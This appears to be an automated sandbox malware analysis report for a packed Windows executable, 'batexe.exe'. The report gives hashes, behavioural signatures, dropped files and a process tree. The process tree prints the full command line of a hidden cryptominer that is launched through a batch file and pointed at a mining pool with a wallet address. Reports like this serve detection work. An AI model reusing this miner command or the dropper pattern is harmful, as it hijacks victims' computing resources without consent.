Analysis

  • max time kernel
    293s
  • max time network
    301s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-ja
  • resource tags

    arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
  • submitted
    24-02-2024 06:00

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:324
    • C:\Users\Admin\AppData\Local\Temp\737A.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\737A.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\737A.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3868
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\754F.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4484
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2132

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\737A.tmp\b2e.exe

    Filesize

    3.6MB

    MD5

    47f1454cd4f6a38b0703f9693f2fbd62

    SHA1

    d745d6a8fc5314b68174d7f06ab369440b96306a

    SHA256

    a007b0f85bacf055b10b1e87a0de5627fc6c3f1659ad473879ddd38fd50fc52b

    SHA512

    a6a39525a4cd1fd170babbc578a5134d1a1878cb02773429cf9be242442c0a67d208f8b08ae80589d1b966ba14d7856cb792bae8bb080a004589de8bd2cb0a48

  • C:\Users\Admin\AppData\Local\Temp\737A.tmp\b2e.exe

    Filesize

    3.8MB

    MD5

    8782954c8b6aac082ecc8b96cb0fa380

    SHA1

    2fe2dfb712df083d04ef662151f7a323078cdbaf

    SHA256

    472a521487323090d233b2931089d485be932bb7b1df7cc096c8b498ff04a73b

    SHA512

    d8a809cff6a7fa2b0762724eabda592db73e20311c184937574671be8cdff033ed4b9886992aa225aa923449c5a5a7949bcd5194ac26972001b95349506beb31

  • C:\Users\Admin\AppData\Local\Temp\754F.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    467KB

    MD5

    9baaea773ed0ff18bb1abed020d365bb

    SHA1

    ec2d1d92d002cc16b63e412d24d23024db51fae0

    SHA256

    30f628f1c61d025ecd5bb9632bb734dc860c18d64fd73b04128e1a41b9faeb44

    SHA512

    0fdf3909ad03c00d25328353737cc8f34c625ed3ae755d17ac0840a301b7a180fbb39c080035f3ceb8e05671167bacd73589fdec12e9fd4858784ee3971167bc

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    600KB

    MD5

    f63e153a45306a4fd0b69f84f8f7d9f5

    SHA1

    36b572ec517f4d237ea530c9b76d79e506bdbba4

    SHA256

    82ae9c236489542debb71732764302b7031825f31ec78e47e5cd7957d220ad97

    SHA512

    a9ad9f98e6ace1ab9f35f396a801283d99d57e6312883e57019857b67050f0cabba71b34c722d5a36a979dfcc293ca4ecbb62ce9780d921696ae46b09aee4304

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    533KB

    MD5

    7811a3c07f84e707205cc1cc84d83e1e

    SHA1

    3d85b493ddbcee97818689f7061547daf06c1d1b

    SHA256

    7dc970929960b25cb59f0721cb73e312e336a4bc7b0becbefff4208e2711c3fe

    SHA512

    8f054fab0263e240997bdc64397f1e2b353814e1e402a2683667159f002455efc92b7978c4428ff97a11c0098cadcd9ed574c2a8bee72580f983b3d54e7a24a2

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    628KB

    MD5

    ad9b805f1f9a52c1a157e47206a3aa0a

    SHA1

    93f725ddee95067e287a9f254b516ffef18c676c

    SHA256

    d9baee691176f6a20304ea5b58eda5ff17a286e0306c2eaeb8ffbf03576b6983

    SHA512

    ce69cec5110d41a2454f63544204b00ffe8573335ee40c462b62cd37a5e2b469e938da69dfd10935c12387a2b30a9250dbf80884e84ba2b31fc91316c9b4b9b2

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    548KB

    MD5

    246d0cda5ed07c63383e7321c2f428a6

    SHA1

    eaf51458cd9504d2a67acbc7ead8e20c527d881f

    SHA256

    63802fd1c6300cfe4d0f47c3bbe5d4c50bc4d542fe3c57b05c7d58fc12e7e4d3

    SHA512

    daa1f618f729f757ebb73a3af62b736591b8a74af1bff3c798d1bae41cc9c1615756bbbb57733a19d980c9628b061986f615c70f7e0ab681d69d69a7aca3d22e

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    606KB

    MD5

    585efec1bc1d4d916a4402c9875dff75

    SHA1

    d209613666ccac9d0ddab29a3bc59aa00a0968fa

    SHA256

    2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

    SHA512

    b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

  • \Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    803KB

    MD5

    790db2f5733c43d6e4f843277bcc95c7

    SHA1

    ba8c5f63892103cf09abd8ea08f198f5ad673eae

    SHA256

    13a5349d221c5059871a6ca7a900abe2f1b709b907184195706d883811374df1

    SHA512

    339ee96b86f41a6c68dcac63b45c264af2c92dd847e5a14b8dc284f588b9da096e1ed8aac845c54067aba9fcfb1c558f5da9f4d9c8443a1e91f642e3e3fb0497

  • \Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    384KB

    MD5

    b91f7bb5508b343188ec32dcc7880611

    SHA1

    fe2ae7ba4a1bbb2a5df7b73f21a0b8fc745cc11f

    SHA256

    47881756cdfcb302e63efb2016c122a1bb61574d81186275aef3d5a9fb72b84b

    SHA512

    a5b91bc653cbf28219b6f169d5d849fb53eced9a932b8edf468c9092544795ee8120d5c76f0c45f27b7a2464c328f5bffcabf3e83d2e7236263ea930cf92eea0

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    494KB

    MD5

    92fc6fc0c5ab693a6ee7d52b807aee80

    SHA1

    89ea84584c6ddee85e6124168ec9db734d02fac0

    SHA256

    61f634b918f12abf92726328faf790b1eefa3acfcaded5cbbb33d2296b04e299

    SHA512

    3bc23588af87a6c8834fda2eb98ccb5c43a6083ec60afbc87c635ee61060bb1d4a09157b74d3f679c442e44baa4a98390add3f0e20aa2206cda228a137653066

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    277KB

    MD5

    62539ee480d420279f61da5b64059b4e

    SHA1

    20a1749fd115f352913667e06494db087434cadd

    SHA256

    92d43579ac1687bf4470ef5c4ddddd4e1d4d62f8d83f8b21b4b82fc49dcbdd17

    SHA512

    dbbf2de94abdd258c639f460c9bd4c9b1daa681534d53b6b2df4d6b38c4fd41ebd7ce1defa6a99c3f2261ac85577de5dcb128c4e7f8c170133ad451e542c20eb

  • \Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    417KB

    MD5

    25329278e5465ad461c0cb1aef1c6444

    SHA1

    9f1c03707d20014457313c0fa63381be0b548c08

    SHA256

    8323e292be6d15ffd449045fb5103ccf906fd802c939985b92dd7045a41a04e5

    SHA512

    e170567f4d8d2d2c6a5dd3743ce0de464e4f440223e29b2b8d3777d4e7c406ae93c211261ce39d335e36272b08986aac1dc89cd38e036f2b5d0774a27ce2b85d

  • memory/324-5-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB

  • memory/2132-43-0x00000000596F0000-0x0000000059788000-memory.dmp

    Filesize

    608KB

  • memory/2132-96-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2132-41-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/2132-42-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/2132-40-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2132-44-0x0000000001140000-0x00000000029F5000-memory.dmp

    Filesize

    24.7MB

  • memory/2132-45-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2132-91-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2132-51-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2132-56-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2132-61-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2132-66-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2132-76-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2132-81-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3868-6-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/3868-50-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB